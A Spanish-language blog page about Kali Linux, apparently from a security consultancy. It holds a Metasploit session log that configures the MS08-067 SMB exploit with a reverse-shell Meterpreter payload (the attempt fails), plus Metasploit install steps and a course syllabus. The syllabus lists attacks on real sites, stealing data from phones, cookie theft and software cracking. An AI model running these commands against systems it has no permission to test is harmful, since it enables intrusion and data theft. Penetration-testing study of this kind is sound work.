Mostrando entradas con la etiqueta KALI LUNUX. Mostrar todas las entradas
Mostrando entradas con la etiqueta KALI LUNUX. Mostrar todas las entradas

martes, 7 de julio de 2015

KALI LINUX

KALI  LINUX THE EVOLUTION OF BACKTRACK

https://www.youtube.com/watch?v=qvmKZE4LkyE
KALI LINUX INSTALLATION STEPS
INSTALACION DE KALI LINUX AQUI

ZEN CONSULTING 
root@kali:~# msfconsole
[*] Starting the Metasploit Framework console.../
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


Save 45% of your time on large engagements with Metasploit Pro
Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.0-2015013101 [core:4.11.0.pre.2015013101 api:1.0.0]]
+ -- --=[ 1389 exploits - 788 auxiliary - 223 post        ]
+ -- --=[ 356 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse
        [-] The value specified for payload is not valid.
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.14.129
lhost => 192.168.14.129
msf exploit(ms08_067_netapi) > set rhost 192.168.15.58
rhost => 192.168.15.58
msf exploit(ms08_067_netapi) > set lport 4444
lport => 4444
msf exploit(ms08_067_netapi) > set rport 445
rport => 445
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.15.58    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh,
thread, process, none)
   LHOST     192.168.14.129   yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.14.129:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 8.1 -  - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit failed [no-target]: No matching target
msf exploit(ms08_067_netapi) >

Next steps to get started with Metasploit Pro


Thank you for your submission. In order to comply with United States export regulations, all requests for Metasploit Community and Metasploit Pro outside of the United States or Canada must be reviewed by Rapid7 to determine if you are a restricted government end user before you receive a license key. If you would like to access Metasploit Framework, please click here. We apologize for any inconvenience this may cause.

STEP 1: Download



STEP 2: Install

  • Metasploit uses some of the same techniques as malware and malicious attackers to audit your security. For Metasploit to run properly, you must switch off anti-virus solutions and your local firewall before the installation and during its use. If you are not comfortable turning off defenses on this computer, consider installing Metasploit on a dedicated virtual machine (set virtual machine NIC to bridged mode). Ubuntu works great and doesn't incur any OS licensing fees.
  • Once the download is complete, run the installer and follow the step by step instructions. This installer contains all Metasploit editions.

STEP 3: Activate

  • An email containing your license key has been sent to the email address provided on the previous registration page. Insert your license key into Metasploit to activate Metasploit Pro edition.
  • Note: It may take up to 15 mins to receive your license delivery email. Please check your spam folder, if you do not receive the email or cannot find the license key in the email, contact info@rapid7.com.




INTERESTING THIS NEW TOOL
https://github.com/AlessandroZ/LaZagne



domingo, 15 de marzo de 2015

KALI LINUX BACKTRACK LINUX SECURITY, PENTESTING

TEMARIO DE SEGURIDAD OFENSIVA

Que es un hacker?
Tipos de hacker
Sistemas Operativos
Conceptos basicos de Networking
Instalacion de entornos virtuales
Conociendo VMware
Corriendo sistemas operativos simultaneamente
Creando maquinas virtuales
Configuracion NAT y Bridged
Instalacion de diferentes OS para pruebas
Instalacion de entorno Apache, php y mysql en Windows
Instalacion de Perl
Instalacion de Phyton
Comandos de consola cmd y terminal

Hackeo y Defensa de Paginas Web

-Fuerza bruta por plugin, por codigo y por software
-Ejecucion de Comandos
-Frameworks de explotacion via Browser
-Entendiendo la Inyeccion SQL
-Herramientas automatizadas de inyeccion
-Havij
-Ataques XSS (Cross Site Scripting)
-XSS Robo de cookie y clonacion
-XSS a sitios reales
-Google Hacking
-Evasion de filtros XSS
-Control de navegadores con BeeF
-Ataques de ejecucion remota
-Elaboracion de exploits con Phyton
-Shells PHP
-Remote File Inclusion
-Local File Inclusion
-Wargames
-Ataques de estres DoS
-Hackeo de un Casino Online

Man in the Middle

-Definicion MITM
-ARP Poisoning
-Interceptar datos via Browser
-Modificacion de Cabezeras
-Interceptar datos de un binario
-Ataques de red local
-Atacando a Windows XP desde BackTrack
-Atacando a BackTrack desde Windows XP
-Credential Harvesting
-Ataques automatizados

Metasploit

-Armitage
-Shells remotas
-Remote Keylogger
-Obtener capturas de pantalla de ordenador hackeado
-Monitoreo en tiempo real
-Social Engineering ToolKit (SET)
-Creando una pagina falsa
-Envenenamiento de HOSTS
-Vectores de Ataque

VIRTUALIZACION CLOUD PARA MITIGAR DDOS

-Cloud Hosting
-SAN Storage
-Diferencia entre Raids
-Algoritmos de alta redundancia
-Maquinas virtuales configuracion VMware Workstation
-Virtual Storage Appliace (VSA)
-Creando clusters
-Managers, y Fail Over Manager
-Iniciador iSCSI
-Montando tu primer volumen virtualizado
-Pruebas de alta disponibilidad contra DDoS
-Snapshots, Rollover volume
-Fractional Bandwidth Protection
-IP Virtual para manejar clusters

Hackeo de Moviles

(Android Hacking, iOS Hacking)

1.-Consola de Metasploit
1.1.-busqueda de módulos y exploits para Android
2.1.-Creacion de un “.Apk” infectado para su instalación en un sistema Android
2.2.-Instalacion del “.Apk” (intervención del usuario)
3.-Explotacion Local y Remota
3.1.-Acceso local al dispositivo
3.2.-Manejo de la sesión “meterpreter” en el Dispositivo infectado
3.3.-Conociendo las cámaras de fotografía del dispositivo
3.4.-Tomando fotografías con el Dispotivo (cámara frontal y delantera)
3.5.-Robo de información , fotografías , bd de whatsapp (en caso de tener)
-Brute Force al ssh de iPhone/ipad/ipodTouch
-Desbloqueo de iCloud

Informatica

Forense

1.-Conociendo el Software “PhotoRec”
2.-Instalacion y creación de Alias
3.-Perdiendo/Borrando Datos en una USB/HDD
4.-Ejercicio de Recuperacion
5.-Analisis de Datos
6.-Recuperacion de Archivos a nivel Forense
Dumpeo de memoria RAM
Analisis de metadatos
Cadena de custodia
Analisis Forense a iOS

INGENIERIA

INVERSA

 Y

CRACKING



* PE structure
* Metodo – String references
* Metodo – Serial fishing
* Metodo – API cracking
* Creando un parche
* Creando Loader
* crackeando aplicaciones .NET
* crackeando aplicaciones JAVA
* Metodo – Inline patching
* Metodos anticracking (antidump, antidebugging)

zen consultora

Blogger Widgets